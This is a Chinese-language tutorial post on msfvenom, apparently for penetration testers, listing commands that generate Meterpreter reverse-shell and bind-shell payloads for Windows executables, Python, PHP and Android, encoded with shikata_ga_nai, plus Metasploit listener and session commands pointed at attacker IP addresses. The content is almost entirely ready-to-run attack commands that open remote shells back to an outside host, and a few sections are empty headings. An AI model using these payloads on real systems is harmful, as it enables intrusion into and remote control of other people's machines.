这是一篇关于msfvenom文章。由于作者能力有限,文中定会出现一些错误,请谅解。本文创建时间为2020年6月4日,最近一次更新时间为2020年9月15日。本文会不定期更新。鉴于凡世之忙碌,下一次更新也许是明天,也许是下辈子。
关于什么是msfvenom?更多详细内容见 msfvenom官网和如何使用。
01-msfvenom概述
基础介绍
msfvenom一般需要配合msf进行利用。使用msfvenom生成shellcode,使用msf进行监听,在靶机上运行shellcode。msfvenom几乎支持生成各种平台的shellcode。是后渗透测试过程中强大的武器之一。
安装方式
msfvenom是msfpayload和msfencode的组合,安装msf之后便可使用。
一键安装msf
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall && ./msfinstall
更新msf
sudo msfupdate
02-msfvenom命令
- msfvenom -h #查看帮助
- msfvenom -l payloads #查看支持生成的payload
- msfvenom -l archs #查看支持的系统架构
- msfvenom -l platforms #查看支持的平台
- msfvenom -l encrypt #查看所有的加密方式
- msfvenom -l encoders #查看所有的编码器
例:
msfvenom -a 系统架构 –platform 系统平台 -p 有效载荷 lhost=攻击机IP lport=攻击机端口 -e 编码方式 -i编码次数 -f 输出格式 -o 输出文件
msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp lhost=111.231.228.112 lport=6059 -i 3 -e x86/shikata_ga_nai -f exe -o x86reverse_tcp.exe
03-msfvenom利用
MSF监听器
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp #设置成payload的模式
- set rhost 111.111.111.112
- set lport 6095
- exploit -j
sessions操作
- sessions -i 2
- shell
Windows exe
靶机无公网ip
- msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x86reverse_tcp.exe
- msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f exe -o x64reverse_tcp.exe
靶机有公网ip
- msfvenom -p windows/x64/meterpreter/bind_tcp lport=6095 -f exe -o bind_tcp.exe
Linux elf
Python
靶机无公网ip
- msfvenom -p windows/meterpreter/reverse_tcp lhost=111.111.111.112 lport=6095 -f py -o x86reverse_tcp.py
靶机有公网ip
- msfvenom -p windows/x64/meterpreter/bind_tcp lport=6095 -f py -o exp.py
PHP
- msfvenom -p php/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=6095 -f raw -o session.php
Android
- msfvenom -p android/meterpreter/reverse_tcp LHOST=111.111.111.112 LPORT=80 -o msf.apk
apple_ios
04-参考链接
- https://blog.csdn.net/caiqiiqi/article/details/84102629